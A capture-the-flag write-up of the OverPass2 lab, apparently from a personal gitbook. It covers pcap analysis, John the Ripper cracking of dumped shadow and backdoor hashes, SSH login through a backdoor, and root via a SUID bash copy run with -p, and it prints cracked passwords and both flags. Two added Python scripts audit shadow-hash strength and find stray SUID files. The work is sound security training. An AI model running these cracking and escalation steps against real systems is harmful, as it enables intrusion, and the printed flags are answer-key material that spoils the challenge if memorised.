dmdhrumilmistry's gitbook
OverPass2


Last updated 2 years ago

Target Details

  • IP: 10.10.145.49

Analyze pcap file

  • Download the pcap file

  • Open it with Wireshark

    sudo wireshark

  • Follow the TCP streams (Analyze > Follow > TCP Stream); the captured sessions contain the answers to all the questions

Crack Hashes from the WireShark packets

  • Download the wordlist

  • While analyzing the packets, copy the shadow file entries that were dumped into a shadow_dump.txt file

  • Crack the shadow file passwords using John

    john -w=/usr/share/wordlists/fasttrack.txt shadow_dump.txt

    The user hashes are stored in shadow_dump.txt; the cracked passwords are:

    Username    Password
    bee         secret12
    szymex      abcd123
    muirland    1qaz2wsx
    paradox     secuirty3

  • Get the hash from the packet capture and the hard-coded salt from the ssh-backdoor GitHub repo

  • Store them in a hash.txt file in hash:salt format

  • Crack it using John

    john -w=/usr/share/wordlists/rockyou.txt hash.txt

    Username    Password
    james       november16
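The shadow dump cracked above is only as strong as the scheme and rounds each entry uses. The following is an added example (not part of the writeup) of the check a defender would run over such a dump before an attacker does: it parses shadow-format lines, identifies the crypt(3) scheme from the $id$ prefix, and flags empty passwords, legacy DES and md5crypt hashes, and sha512crypt/bcrypt entries configured with too few rounds. SAMPLE_DUMP is constructed; the usernames echo the writeup but the hash bodies are placeholders, not real hashes.

```python
"""Audit an /etc/shadow-style dump for weak or risky entries.

Added example, not code from the OverPass2 writeup. SAMPLE_DUMP is constructed: the
usernames echo the writeup, but the hash bodies are placeholders, not real hashes.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# crypt(3) scheme ids as they appear after the leading "$": id -> (name, considered weak?)
SCHEMES = {
    "1": ("md5crypt", True),
    "2a": ("bcrypt", False), "2b": ("bcrypt", False), "2y": ("bcrypt", False),
    "5": ("sha256crypt", False),
    "6": ("sha512crypt", False),
    "7": ("scrypt", False),
    "y": ("yescrypt", False),
}
DEFAULT_ROUNDS = 5000    # glibc default for sha256crypt/sha512crypt when no rounds= is present
MIN_BCRYPT_COST = 10

# Constructed sample: one entry per condition the auditor knows how to flag
SAMPLE_DUMP = """\
root:$6$saltsalt$PLACEHOLDERHASHBODY:19000:0:99999:7:::
bee:$6$rounds=1000$saltsalt$PLACEHOLDERHASHBODY:19000:0:99999:7:::
szymex:$1$saltsalt$PLACEHOLDERHASH:19000:0:99999:7:::
muirland:!$6$saltsalt$PLACEHOLDERHASHBODY:19000:0:99999:7:::
paradox::19000:0:99999:7:::
legacy:abPLACEHOLDER:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
"""

# $id$[rounds=N$]salt[$hash]  (bcrypt stores its cost where the others store the salt)
_CRYPT_RE = re.compile(r"^\$([^$]+)\$(?:rounds=(\d+)\$)?([^$]*)(?:\$(.*))?$")


@dataclass
class Finding:
    user: str
    scheme: str = "none"
    rounds: Optional[int] = None
    issues: List[str] = field(default_factory=list)


def audit_entry(line: str) -> Finding:
    """Classify one shadow line: user:secret:lastchange:min:max:warn:inactive:expire:flag."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        raise ValueError(f"not a shadow entry: {line!r}")
    finding = Finding(user=fields[0])
    secret = fields[1]
    if secret == "":
        finding.issues.append("no-password")   # login succeeds with an empty password
        return finding
    if secret[0] in "!*":
        finding.issues.append("locked")
        secret = secret.lstrip("!*")            # a locked entry may still carry its old hash
        if not secret:
            return finding
    m = _CRYPT_RE.match(secret)
    if m is None:
        finding.scheme = "descrypt"             # no $id$ prefix: legacy 13-character DES crypt
        finding.issues.append("weak-scheme:descrypt")
        return finding
    scheme_id, rounds, salt_or_cost, _hash = m.groups()
    if scheme_id not in SCHEMES:
        finding.scheme = f"unknown({scheme_id})"
        finding.issues.append("unknown-scheme")
        return finding
    name, weak = SCHEMES[scheme_id]
    finding.scheme = name
    if weak:
        finding.issues.append(f"weak-scheme:{name}")
    if name == "bcrypt":
        finding.rounds = int(salt_or_cost)
        if finding.rounds < MIN_BCRYPT_COST:
            finding.issues.append("low-rounds")
    elif name in ("sha256crypt", "sha512crypt"):
        finding.rounds = int(rounds) if rounds else DEFAULT_ROUNDS
        if finding.rounds < DEFAULT_ROUNDS:
            finding.issues.append("low-rounds")
    return finding


def audit_dump(text: str) -> Dict[str, List[str]]:
    """Map every user in the dump to its issues; an empty list means nothing was flagged."""
    entries = (audit_entry(line) for line in text.splitlines() if line.strip())
    return {f.user: f.issues for f in entries}


if __name__ == "__main__":
    for user, issues in audit_dump(SAMPLE_DUMP).items():
        print(f"{user:<10} {', '.join(issues) or 'ok'}")
```

Run it against a real dump with `audit_dump(open("shadow_dump.txt").read())`; an entry that comes back clean can still fall to a wordlist like fasttrack if the password itself is weak, so the scheme audit complements, rather than replaces, checking password quality.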

Hack Again

  • Log in through the backdoored SSH service, since we already know james' password

    ssh -p 2222 james@10.10.145.49

  • Get the user flag

    cat /home/james/user.txt
    # thm{d119b4fa8c497ddb0525f7ad200e6567}

  • On listing hidden files, we find .suid_bash, a SUID-root copy of bash; running it with -p makes bash keep the elevated effective UID instead of dropping it

    /home/james/.suid_bash -p
    .suid_bash-4.4#

  • We've rooted the machine

    .suid_bash-4.4# whoami
    root

  • Get the root flag

    .suid_bash-4.4# cat /root/root.txt
    thm{d53b2684f169360bb9606c333873144d}
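The persistence left behind here is a set-uid root binary hidden as a dotfile in a home directory. The following is an added example (not part of the writeup) of the audit a defender would run to surface exactly that: it walks a tree, reports every regular file owned by a given uid with the SUID or SGID bit set, and marks anything outside the usual system directories as suspicious. The expected-prefix list, the `demo()` fixture and its file names are assumptions for the example; on a real host you would call `find_setid("/")` with the default `owner_uid=0`.

```python
"""Find set-uid/set-gid executables in unexpected locations.

Added example, not part of the OverPass2 writeup. A SUID-root copy of bash dropped into a
home directory, like the .suid_bash the writeup uses, is exactly what this reports.
"""
import os
import stat
import tempfile
from typing import List, Tuple

# Directories where SUID helpers (passwd, sudo, mount, ...) are expected to live (assumed list)
EXPECTED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")
SKIP_DIRS = ("/proc", "/sys", "/dev")   # virtual filesystems, nothing to audit there


def is_setid(path: str, owner_uid: int) -> bool:
    """True for a regular file owned by owner_uid with the SUID or SGID bit set."""
    try:
        st = os.lstat(path)           # lstat: a symlink's own mode never carries a set-id bit
    except OSError:
        return False
    if not stat.S_ISREG(st.st_mode):
        return False
    return st.st_uid == owner_uid and bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))


def find_setid(root_dir: str, owner_uid: int = 0) -> List[Tuple[str, str]]:
    """Walk root_dir and return (path, verdict) for each set-id file owned by owner_uid.

    verdict is "expected" under the known system prefixes and "suspicious" elsewhere
    (home directories, /tmp, web roots, ...). Dotfiles are walked like any other file,
    so a hidden .suid_bash does not escape.
    """
    hits = []
    for dirpath, dirnames, filenames in os.walk(root_dir):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if is_setid(path, owner_uid):
                verdict = "expected" if path.startswith(EXPECTED_PREFIXES) else "suspicious"
                hits.append((path, verdict))
    return sorted(hits)


def demo() -> List[Tuple[str, str]]:
    """Build a constructed tree in a temp dir (one set-uid dotfile, one plain file) and audit it.

    The files are owned by the current user, so the audit runs with owner_uid=os.getuid();
    on a real host you would call find_setid("/") with the default owner_uid=0 instead.
    """
    with tempfile.TemporaryDirectory() as base:
        planted = os.path.join(base, ".suid_bash")   # constructed, mirrors the writeup's name
        plain = os.path.join(base, "notes.txt")
        for p in (planted, plain):
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\n")
        os.chmod(planted, 0o4755)   # rwsr-xr-x: the set-uid bit the writeup relies on
        os.chmod(plain, 0o755)
        return [(os.path.relpath(p, base), v) for p, v in find_setid(base, owner_uid=os.getuid())]


if __name__ == "__main__":
    for path, verdict in demo():
        print(f"{verdict:<10} {path}")
```

Scheduling this audit and diffing its output against a known-good baseline turns a planted set-uid shell into an alert rather than a surprise; a package-managed system should show only the "expected" entries, and any "suspicious" hit under a home directory deserves the same scrutiny the writeup's .suid_bash gets.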